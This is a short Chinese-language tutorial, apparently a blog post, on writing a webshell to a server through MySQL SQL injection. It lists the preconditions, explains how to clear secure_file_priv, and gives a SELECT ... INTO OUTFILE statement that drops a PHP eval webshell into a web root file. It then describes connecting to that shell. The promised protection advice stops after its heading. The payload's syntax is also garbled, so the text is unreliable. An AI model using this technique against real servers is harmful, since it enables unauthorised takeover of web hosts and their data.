mysql写shell
一、Sql注入写shell
原理:select into outfile命令作用将查询结果输出保存到一个文件中
通过sql注入写shell的三个条件:
- 知道绝对路径
- Secure_file_priv开启
一般Secure_file_priv=null,即不允许导入导出,在mysql中my.ini的[mysqld]中添加一行“Secure_file_priv=”,然后重启mysql,让配置生效。 - 目录要有写的权限
利用sql注入写入sql语句:select 1,2,“<?php @eval[$_POST[dd]; ?]>” into outfile “D:/phpstudy/phpstudy_pro/WWW/1.php”
Mysql中select into outfile命令作用将查询结果输出保存到一个文件中,以上语句会保存到1.php文件中
随便什么刀连接一下
Getshell成功
防护建议:利用sql注入漏洞结合数据库的输出文本功能形成getshell,